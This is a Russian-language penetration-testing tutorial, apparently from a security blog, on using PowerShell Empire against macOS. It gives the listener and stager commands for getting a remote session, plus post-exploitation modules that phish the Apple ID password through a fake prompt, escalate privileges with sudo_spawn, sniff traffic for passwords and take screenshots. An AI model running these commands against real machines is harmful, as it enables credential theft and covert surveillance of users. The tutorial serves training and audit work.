👨⚕️️‍♂️ Эксплуатация OSX с Powershell Empire |

👨⚕️️‍♂️ Эксплуатация OSX с Powershell Empire

Мануал

В этой статье мы изучим тестирование на проникновения OSX с использованием empire.

Содержание

Эксплуатация MAC

Постэксплуатация

  • Фишинг
  • Повышение привилегий
  • Сниффинг

Эксплуатация MAC

Здесь я полагаю, что вы знакомы с основами PowerShell Empire, поэтому сначала мы создадим прослушиватель, используя следующие команды: uselistener http set Host //192.168.1.26 execute

 uselistener httpset Host //192.168.1.26execute 

Выполнение вышеуказанных команд запустит слушателя, как показано на рисунке выше.

Теперь следующим шагом является создание Stager для OS X.

Для этого введите: usestager osx / launcher execute

 usestager osx/launcherexecute 

Как вы можете видеть на изображении выше, вышеприведенный stager сгенерирует код.

Выполните этот код в целевой системе, то есть в OS X, и после выполнения вы получите сеанс, как показано на рисунке ниже:

 

Постксплуатация

Фишинг

Поскольку у нас есть сеанс нашего Mac, есть несколько пост-эксплойтов, которые можно использовать в наших интересах.

Первый модуль постэксплуатации, который мы будем использовать, – это коллекция /osx/prompt.

Использование этого модуля попросит пользователя ввести свой пароль к своему Apple ID, что означает, что этот модуль не работает в невидимом режиме.

Для использования этого типа модуля используйте usemodule collection/osx/prompt execute

 usemodule collection/osx/promptexecute 

Выполнение вышеуказанного модуля откроет подсказку на целевом компьютере, как показано на рисунке ниже, и когда вы введете пароль, вы получите его в виде открытого текста, как показано на рисунке выше.

Повышение привилегий

Для повышения привилегий в OS X мы использовали модуль privesc/multi/sudo_spawn.

Чтобы использовать на этот тип модуля:

 usemodule privesc/multi/sudo_spawnset Listener httpset Password toorexecute 

Выполнение этого модуля даст вам права администратора с новым сеансом, как вы можете увидеть на изображении ниже:

Сниффинг

Следующий модуль, который мы будем использовать, это collection/osx/sniffer.

Он будет анализировать весь трафик, приходящий и выходящий из нашей целевой системы, и предоставит нам все необходимые детали, создав файл pcap.

Для использования типа модуля используйте usemodule collection/osx/sniffer execute:

 usemodule collection/osx/snifferexecute 

Как вы можете увидеть, вы даже найдете пароль в открытом тексте в файле pcap, как показано на рисунке ниже:

Следующий пост-модуль – сделать снимок экрана целевой системы и использовать указанный тип модуля: usemodule collection/osx/screenshot execute

 usemodule collection/osx/screenshotexecute 

Приведенный выше модуль сделает снимок экрана, как показано на рисунке ниже:

Существует еще несколько поcn-модулей, которые вы можете использовать и экспериментировать с ними, как показано на рисунке ниже:

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий